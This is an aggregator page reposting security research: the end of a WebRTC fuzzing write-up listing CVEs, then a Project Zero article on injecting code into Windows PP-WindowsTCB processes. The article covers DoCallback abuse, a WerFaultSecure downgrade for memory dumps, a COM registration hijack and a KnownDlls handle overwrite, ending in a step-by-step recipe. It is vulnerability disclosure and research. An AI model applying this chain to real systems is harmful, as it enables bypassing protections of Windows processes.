CVE-2018-6156 is probably the most exploitable bug uncovered. It is a large overflow in FEC. The buffer WebRTC uses to process FEC packets is 1500 bytes, but it does no size checking of these packets once they are extracted from RTP. Practically, they can be up to about 2000 bytes long.
CVE-2018-6155 is a use-after-free in a video codec called VP8. It is interesting because it affects the VP8 library, libvpx as opposed to code in WebRTC, so it has the potential to affect software that uses this library other than WebRTC. A generic fix for libvpx was released as a result of this bug.
CVE-2018-16071 is a use-after-free in VP9 processing that is somewhat similar to CVE-2018-6130. Once again, an untrusted index is pulled out of a packet, but this time it is used as the upper bounds of a vector erase operation, so it is possible to delete all the elements of the vector before it is used.
CVE-2018-16083 is an out-of-bounds read in FEC that occurs due to a lack of bounds checking.
Overall, end-to-end fuzzing found a lot of bugs in WebRTC, and a few were fairly serious. They have all now been fixed. This shows that end-to-end fuzzing is an effective approach for finding vulnerabilities in this type of video conferencing solution. In Part 2, we will try a similar approach on FaceTime. Stay tuned!
Kategorie: Hacking & Security

Injecting Code into Windows Protected Processes using COM - Part 2

30 Listopad, 2018 - 19:11
Posted by James Forshaw, Project Zero
In my previous blog I discussed a technique which combined numerous issues I’ve previously reported to Microsoft to inject arbitrary code into a PPL-WindowsTCB process. The techniques presented don’t work for exploiting the older, stronger Protected Processes (PP) for a few different reasons. This blog seeks to remedy this omission and provide details of how I was able to also hijack a full PP-WindowsTCB process without requiring administrator privileges. This is mainly an academic exercise, to see whether I can get code executing in a full PP as there’s not much more you can do inside a PP over a PPL.
As a quick recap of the previous attack, I was able to identify a process which would run as PPL which also exposed a COM service. Specifically, this was the “.NET Runtime Optimization Service” which ships with the .NET framework and uses PPL at CodeGen level to apply cached signing levels to Ahead-of-Time compiled DLLs to allow them to be used with User-Mode Code Integrity (UMCI). By modifying the COM proxy configuration it was possible to induce a type confusion which allowed me to load an arbitrary DLL by hijacking the KnownDlls configuration. Once running code inside the PPL I could abuse a bug in the cached signing feature to create a DLL signed to load into any PPL and through that escalate to PPL-WindowsTCB level.Finding a New TargetMy first thought to exploit full PP would be to use the additional access we were granted from having code running at PPL-WindowsTCB. You might assume you could abuse the cached signed DLL to bypass security checks to load into a full PP. Unfortunately the kernel’s Code Integrity module ignores cached signing levels for full PP. How about KnownDlls in general? If we have administrator privileges and code running in PPL-WindowsTCB we can directly write to the KnownDlls object directory (see another of my blog posts link for why you need to be PPL) and try to get the PP to load an arbitrary DLL. Unfortunately, as I mentioned in the previous blog, this also doesn’t work as full PP ignores KnownDlls. Even if it did load KnownDlls I don’t want to require administrator privileges to inject code into the process.
I decided that it’d make sense to rerun my PowerShell script from the previous blog to discover which executables will run as full PP and at what level. On Windows 10 1803 there’s a significant number of executables which run as PP-Authenticode level, however only four executables would start with a more privileged level as shown in the following table.
PathSigning LevelC:\windows\system32\GenValObj.exeWindowsC:\windows\system32\sppsvc.exeWindowsC:\windows\system32\WerFaultSecure.exeWindowsTCBC:\windows\system32\SgrmBroker.exeWindowsTCB
As I have no known route from PP-Windows level to PP-WindowsTCB level like I had with PPL, only two of the four executables are of interest, WerFaultSecure.exe and SgrmBroker.exe. I correlated these two executables against known COM service registrations, which turned up no results. That doesn’t mean these executables don’t expose a COM attack surface, the .NET executable I abused last time also doesn’t register its COM service, so I also performed some basic reverse engineering looking for COM usage.
The SgrmBroker executable doesn’t do very much at all, it’s a wrapper around an isolated user mode application to implement runtime attestation of the system as part of Windows Defender System Guard and didn’t call into any COM APIs. WerFaultSecure also doesn’t seem to call into COM, however I already knew that WerFaultSecure can load COM objects, as Alex Ionescu used my original COM scriptlet code execution attack to get PPL-WindowsTCB level though hijacking a COM object load in WerFaultSecure. Even though WerFaultSecure didn’t expose a service if it could initialize COM perhaps there was something that I could abuse to get arbitrary code execution? To understand the attack surface of COM we need to understand how COM implements out-of-process COM servers and COM remoting in general.Digging into COM Remoting InternalsCommunication between a COM client and a COM server is over the MSRPC protocol, which is based on the Open Group’s DCE/RPC protocol. For local communication the transport used is Advanced Local Procedure Call (ALPC) ports. At a high level communication occurs between a client and server based on the following diagram:

In order for a client to find the location of a server the process registers an ALPC endpoint with the DCOM activator in RPCSS ①. This endpoint is registered alongside the Object Exporter ID (OXID) of the server, which is a 64 bit randomly generated number assigned by RPCSS. When a client wants to connect to a server it must first ask RPCSS to resolve the server’s OXID value to an RPC endpoint ②. With the knowledge of the ALPC RPC endpoint the client can connect to the server and call methods on the COM object ③.
The OXID value is discovered either from an out-of-process (OOP) COM activation result or via a marshaled Object Reference (OBJREF) structure. Under the hood the client calls the ResolveOxid method on RPCSS’s IObjectExporter RPC interface. The prototype of ResolveOxid is as follows:
interface IObjectExporter {   // ...   error_status_t ResolveOxid(     [in] handle_t hRpc,     [in] OXID* pOxid,     [in] unsigned short cRequestedProtseqs,     [in] unsigned short arRequestedProtseqs[],     [out, ref] DUALSTRINGARRAY** ppdsaOxidBindings,     [out, ref] IPID* pipidRemUnknown,     [out, ref] DWORD* pAuthnHint );
In the prototype we can see the OXID to resolve is being passed in the pOxid parameter and the server returns an array of Dual String Bindings which represent RPC endpoints to connect to for this OXID value. The server also returns two other pieces of information, an Authentication Level Hint (pAuthnHint) which we can safely ignore and the IPID of the IRemUnknown interface (pipidRemUnknown) which we can’t.
An IPID is a GUID value called the Interface Process ID. This represents the unique identifier for a COM interface inside the server, and it’s needed to communicate with the correct COM object as it allows the single RPC endpoint to multiplex multiple interfaces over one connection. The IRemUnknown interface is a default COM interface every COM server must implement as it’s used to query for new IPIDs on an existing object (using RemQueryInterface) and maintain the remote object’s reference count (through RemAddRef and RemRelease methods). As this interface must always exist regardless of whether an actual COM server is exported and the IPID can be discovered through resolving the server’s OXID, I wondered what other methods the interface supported in case there was anything I could leverage to get code execution.
The COM runtime code maintains a database of all IPIDs as it needs to lookup the server object when it receives a request for calling a method. If we know the structure of this database we could discover where the IRemUnknown interface is implemented, parse its methods and find out what other features it supports. Fortunately I’ve done the work of reverse engineering the database format in my OleViewDotNet tool, specifically the command Get-ComProcess in the PowerShell module. If we run the command against a process which uses COM, but doesn’t actually implement a COM server (such as notepad) we can try and identify the correct IPID.

In this example screenshot there’s actually two IPIDs exported, IRundown and a Windows.Foundation interface. The Windows.Foundation interface we can safely ignore, but IRundown looks more interesting. In fact if you perform the same check on any COM process you’ll discover they also have IRundown interfaces exported. Are we not expecting an IRemUnknown interface though? If we pass the ResolveMethodNames and ParseStubMethods parameters to Get-ComProcess, the command will try and parse method parameters for the interface and lookup names based on public symbols. With the parsed interface data we can pass the IPID object to the Format-ComProxy command to get a basic text representation of the IRundown interface. After cleanup the IRundown interface looks like the following:
[uuid("00000134-0000-0000-c000-000000000046")]interface IRundown : IUnknown {    HRESULT RemQueryInterface(...);    HRESULT RemAddRef(...);    HRESULT RemRelease(...);    HRESULT RemQueryInterface2(...);    HRESULT RemChangeRef(...);    HRESULT DoCallback([in] struct XAptCallback* pCallbackData);    HRESULT DoNonreentrantCallback([in] struct XAptCallback* pCallbackData);    HRESULT AcknowledgeMarshalingSets(...);    HRESULT GetInterfaceNameFromIPID(...);    HRESULT RundownOid(...);}
This interface is a superset of IRemUnknown, it implements the methods such as RemQueryInterface and then adds some more additional methods for good measure. What really interested me was the DoCallback and DoNonreentrantCallback methods, they sound like they might execute a “callback” of some sort. Perhaps we can abuse these methods? Let’s look at the implementation of DoCallback based on a bit of RE (DoNonreentrantCallback just delegates to DoCallback internally so we don’t need to treat it specially):
struct XAptCallback {  void* pfnCallback;  void* pParam;  void* pServerCtx;  void* pUnk;  void* iid;  int   iMethod;  GUID  guidProcessSecret;};
HRESULT CRemoteUnknown::DoCallback(XAptCallback *pCallbackData) {  CProcessSecret::GetProcessSecret(&pguidProcessSecret);  if (!memcmp(&pguidProcessSecret,              &pCallbackData->guidProcessSecret, sizeof(GUID))) {    if (pCallbackData->pServerCtx == GetCurrentContext()) {      return pCallbackData->pfnCallback(pCallbackData->pParam);    } else {      return SwitchForCallback(                   pCallbackData->pServerCtx,                   pCallbackData->pfnCallback,                   pCallbackData->pParam);    }  }  return E_INVALIDARG;}
This method is very interesting, it takes a structure containing a pointer to a method to call and an arbitrary parameter and executes the pointer. The only restrictions on calling the arbitrary method is you must know ahead of time a randomly generated GUID value, the process secret, and the address of a server context. The checking of a per-process random value is a common security pattern in COM APIs and is typically used to restrict functionality to only in-process callers. I abused something similar in the Free-Threaded Marshaler way back in 2014.
What is the purpose of DoCallback? The COM runtime creates a new IRundown interface for every COM apartment that’s initialized. This is actually important as calling methods between apartments, say calling a STA object from a MTA, you need to call the appropriate IRemUnknown methods in the correct apartment. Therefore while the developers were there they added a few more methods which would be useful for calling between apartments, including a general “call anything you like” method. This is used by the internals of the COM runtime and is exposed indirectly through methods such as CoCreateObjectInContext. To prevent the DoCallback method being abused OOP the per-process secret is checked which should limit it to only in-process callers, unless an external process can read the secret from memory.Abusing DoCallbackWe have a primitive to execute arbitrary code within any process which has initialized COM by invoking the DoCallback method, which should include a PP. In order to successfully call arbitrary code we need to know four pieces of information:
  1. The ALPC port that the COM process is listening on.
  2. The IPID of the IRundown interface.
  3. The initialized process secret value.
  4. The address of a valid context, ideally the same value that GetCurrentContext returns to call on the same RPC thread.

Getting the ALPC port and the IPID is easy, if the process exposes a COM server, as both will be provided during OXID resolving. Unfortunately WerFaultSecure doesn’t expose a COM object we can create so that angle wouldn’t be open to us, leaving us with a problem we need to solve. Extracting the process secret and context value requires reading the contents of process memory. This is another problem, one of the intentional security features of PP is preventing a non-PP process from reading memory from a PP process. How are we going to solve these two problems?
Talking this through with Alex at Recon we came up with a possible attack if you have administrator access. Even being an administrator doesn’t allow you to read memory directly from a PP process. We could have loaded a driver, but that would break PP entirely, so we considered how to do it without needing kernel code execution.
First and easiest, the ALPC port and IPID can be extracted from RPCSS. The RPCSS service does not run protected (even PPL) so this is possible to do without any clever tricks other than knowing where the values are stored in memory. For the context pointer, we should be able to brute force the location as there’s likely to be only a narrow range of memory locations to test, made slightly easier if we use the 32 bit version of WerFaultSecure.
Extracting the secret is somewhat harder. The secret is initialized in writable memory and therefore ends up in the process’ working set once it’s modified. As the page isn’t locked it will be eligible for paging if the memory conditions are right. Therefore if we could force the page containing the secret to be paged to disk we could read it even though it came from a PP process. As an administrator, we can perform the following to steal the secret:
  1. Ensure the secret is initialized and the page is modified.
  2. Force the process to trim its working set, this should ensure the modified page containing the secret ends up paged to disk (eventually).
  3. Create a kernel memory crash dump file using the NtSystemDebugControl system call. The crash dump can be created by an administrator without kernel debugging being enabled and will contain all live memory in the kernel. Note this doesn’t actually crash the system.
  4. Parse the crash dump for the Page Table Entry of the page containing the secret value. The PTE should disclose where in the paging file on disk the paged data is located.
  5. Open the volume containing the paging file for read access, parse the NTFS structures to find the paging file and then find the paged data and extract the secret.

After coming up with this attack it seemed far too much like hard work and needed administrator privileges which I wanted to avoid. I needed to come up with an alternative solution.Using WerFaultSecure for its Original PurposeUp to this point I’ve been discussing WerFaultSecure as a process that can be abused to get arbitrary code running inside a PP/PPL. I’ve not really described why the process can run at the maximum PP/PPL levels. WerFaultSecure is used by the Windows Error Reporting service to create crash dumps from protected processes. Therefore it needs to run at elevated PP levels to ensure it can dump any possible user-mode PP. Why can we not just get WerFaultSecure to create a crash dump of itself, which would leak the contents of process memory and allow us to extract any information we require?
The reason we can’t use WerFaultSecure is it encrypts the contents of the crash dump before writing it to disk. The encryption is done in a way to only allow Microsoft to decrypt the crash dump, using asymmetric encryption to protect a random session key which can be provided to the Microsoft WER web service. Outside of a weakness in Microsoft’s implementation or a new cryptographic attack against the primitives being used getting the encrypted data seems like a non-starter.
However, it wasn’t always this way. In 2014 Alex presented at NoSuchCon about PPL and discussed a bug he’d discovered in how WerFaultSecure created encrypted dump files. It used a two step process, first it wrote out the crash dump unencrypted, then it encrypted the crash dump. Perhaps you can spot the flaw? It was possible to steal the unencrypted crash dump. Due to the way WerFaultSecure was called it accepted two file handles, one for the unencrypted dump and one for the encrypted dump. By calling WerFaultSecure directly the unencrypted dump would never be deleted which means that you don’t even need to race the encryption process.
There’s one problem with this, it was fixed in 2015 in MS15-006. After that fix WerFaultSecure encrypted the crash dump directly, it never ends up on disk unencrypted at any point. But that got me thinking, while they might have fixed the bug going forward what prevents us from taking the old vulnerable version of WerFaultSecure from Windows 8.1 and executing it on Windows 10? I downloaded the ISO for Windows 8.1 from Microsoft’s website (link), extracted the binary and tested it, with predictable results:

We can take the vulnerable version of WerFaultSecure from Windows 8.1 and it will run quite happily on Windows 10 at PP-WindowsTCB level. Why? It’s unclear, but due to the way PP is secured all the trust is based on the signed executable. As the signature of the executable is still valid the OS just trusts it can be run at the requested protection level. Presumably there must be some way that Microsoft can block specific executables, although at least they can’t just revoke their own signing certificates. Perhaps OS binaries should have an EKU in the certificate which indicates what version they’re designed to run on? After all Microsoft already added a new EKU when moving from Windows 8 to 8.1 to block downgrade attacks to bypass WinRT UMCI signing so generalizing might make some sense, especially for certain PP levels.
After a little bit of RE and reference to Alex’s presentation I was able to work out the various parameters I needed to be passed to the WerFaultSecure process to perform a dump of a PP:
ParameterDescription/hEnable secure dump mode./pid {pid}Specify the Process ID to dump./tid {tid}Specify the Thread ID in the process to dump./file {handle}Specify a handle to a writable file for the unencrypted crash dump/encfile {handle}Specify a handle to a writable file for the encrypted crash dump/cancel {handle}Specify a handle to an event to indicate the dump should be cancelled/type {flags}Specify MIMDUMPTYPE flags for call to MiniDumpWriteDump
This gives us everything we need to complete the exploit. We don’t need administrator privileges to start the old version of WerFaultSecure as PP-WindowsTCB. We can get it to dump another copy of WerFaultSecure with COM initialized and use the crash dump to extract all the information we need including the ALPC Port and IPID needed to communicate. We don’t need to write our own crash dump parser as the Debug Engine API which comes installed with Windows can be used. Once we’ve extracted all the information we need we can call DoCallback and invoke arbitrary code.Putting it All TogetherThere’s still two things we need to complete the exploit, how to get WerFaultSecure to start up COM and what we can call to get completely arbitrary code running inside the PP-WindowsTCB process.
Let’s tackle the first part, how to get COM started. As I mentioned earlier, WerFaultSecure doesn’t directly call any COM methods, but Alex had clearly used it before so to save time I just asked him. The trick was to get WerFaultSecure to dump an AppContainer process, this results in a call to the method CCrashReport::ExemptFromPlmHandling inside the FaultRep DLL resulting in the loading of CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA}, which resolves to an undocumented COM object. All that matters is this allows WerFaultSecure to initialize COM.
Unfortunately I’ve not been entirely truthful during my description of how COM remoting is setup. Just loading a COM object is not always sufficient to initialize the IRundown interface or the RPC endpoint. This makes sense, if all COM calls are to code within the same apartment then why bother to initialize the entire remoting code for COM. In this case even though we can make WerFaultSecure load a COM object it doesn’t meet the conditions to setup remoting. What can we do to convince the COM runtime that we’d really like it to initialize? One possibility is to change the COM registration from an in-process class to an OOP class. As shown in the screenshot below the COM registration is being queried first from HKEY_CURRENT_USER which means we can hijack it without needing administrator privileges.

Unfortunately looking at the code this won’t work, a cut down version is shown below:
HRESULT CCrashReport::ExemptFromPlmHandling(DWORD dwProcessId) {  CoInitializeEx(NULL, COINIT_APARTMENTTHREADED);  IOSTaskCompletion* inf;  HRESULT hr = CoCreateInstance(CLSID_OSTaskCompletion,      NULL, CLSCTX_INPROC_SERVER, IID_PPV_ARGS(&inf));  if (SUCCEEDED(hr)) {    // Open process and disable PLM handling.  }}
The code passes the flag, CLSCTX_INPROC_SERVER to CoCreateInstance. This flag limits the lookup code in the COM runtime to only look for in-process class registrations. Even if we replace the registration with one for an OOP class the COM runtime would just ignore it. Fortunately there’s another way, the code is initializing the current thread’s COM apartment as a STA using the COINIT_APARTMENTTHREADED flag with CoInitializeEx. Looking at the registration of the COM object its threading model is set to “Both”. What this means in practice is the object supports being called directly from either a STA or a MTA.
However, if the threading model was instead set to “Free” then the object only supports direct calls from an MTA, which means the COM runtime will have to enable remoting, create the object in an MTA (using something similar to DoCallback) then marshal calls to that object from the original apartment. Once COM starts remoting it initializes all remote features including IRundown. As we can hijack the server registration we can just change the threading model, this will cause WerFaultSecure to start COM remoting which we can now exploit.
What about the second part, what can we call inside the process to execute arbitrary code? Anything we call using DoCallback must meet the following criteria, to avoid undefined behavior:
  1. Only takes one pointer sized parameter.
  2. Only the lower 32 bits of the call are returned as the HRESULT if we need it.
  3. The callsite is guarded by CFG so it must be something which is a valid indirect call target.

As WerFaultSecure isn’t doing anything special then at a minimum any DLL exported function should be a valid indirect call target. LoadLibrary clearly meets our criteria as it takes a single parameter which is a pointer to the DLL path and we don’t really care about the return value so the truncation isn’t important. We can’t just load any DLL as it must be correctly signed, but what about hijacking KnownDlls?
Wait, didn’t I say that PP can’t load from KnownDlls? Yes they can’t but only because the value of the LdrpKnownDllDirectoryHandle global variable is always set to NULL during process initialization. When the DLL loader checks for the presence of a known DLL if the handle is NULL the check returns immediately. However if the handle has a value it will do the normal check and just like in PPL no additional security checks are performed if the process maps an image from an existing section object. Therefore if we can modify the LdrpKnownDllDirectoryHandle global variable to point to a directory object inherited into the PP we can get it to load an arbitrary DLL.
The final piece of the puzzle is finding an exported function which we can call to write an arbitrary value into the global variable. This turns out to be harder than expected. The ideal function would be one which takes a single pointer value argument and writes to that location with no other side effects. After a number of false starts (including trying to use gets) I settled on the pair, SetProcessDefaultLayout and GetProcessDefaultLayout in USER32. The set function takes a single value which is a set of flags and stores it in a global location (actually in the kernel, but good enough). The get method will then write that value to an arbitrary pointer. This isn’t perfect as the values we can set and therefore write are limited to the numbers 0-7, however by offsetting the pointer in the get calls we can write a value of the form 0x0?0?0?0? where the ? can be any value between 0 and 7. As the value just has to refer to the handle inside a process under our control we can easily craft the handle to meet these strict requirements. Wrapping UpIn conclusion to get arbitrary code execution inside a PP-WindowsTCB without administrator privileges process we can do the following:
  1. Create a fake KnownDlls directory, duplicating the handle until it meets a pattern suitable for writing through Get/SetProcessDefaultLayout. Mark the handle as inheritable.
  2. Create the COM object hijack for CLSID {07FC2B94-5285-417E-8AC3-C2CE5240B0FA} with the ThreadingModel set to “Free”.
  3. Start Windows 10 WerFaultSecure at PP-WindowsTCB level and request a crash dump from an AppContainer process. During process creation the fake KnownDlls must be added to ensure it’s inherited into the new process.
  4. Wait until COM has initialized then use Windows 8.1 WerFaultSecure to dump the process memory of the target.
  5. Parse the crash dump to discover the process secret, context pointer and IPID for IRundown.
  6. Connect to the IRundown interface and use DoCallback with Get/SetProcessDefaultLayout to modify the LdrpKnownDllDirectoryHandle global variable to the handle value created in 1.
  7. Call DoCallback again to call LoadLibrary with a name to load from our fake KnownDlls.

This process works on all supported versions of Windows 10 including 1809. It’s worth noting that invoking DoCallback can be used with any process where you can read the contents of memory and the process has initialized COM remoting. For example, if you had an arbitrary memory disclosure vulnerability in a privileged COM service you could use this attack to convert the arbitrary read into arbitrary execute. As I don’t tend to look for memory corruption/memory disclosure vulnerabilities perhaps this behavior is of more use to others.
That concludes my series of attacking Windows protected processes. I think it demonstrates that preventing a user from attacking processes which share resources, such as registry and files is ultimately doomed to fail. This is probably why Microsoft do not support PP/PPL as a security boundary. Isolated User Mode seems a much stronger primitive, although that does come with additional resource requirements which PP/PPL doesn’t for the most part.  I wouldn’t be surprised if newer versions of Windows 10, by which I mean after version 1809, will try to mitigate these attacks in some way, but you’ll almost certainly be able to find a bypass.
Kategorie: Hacking & Security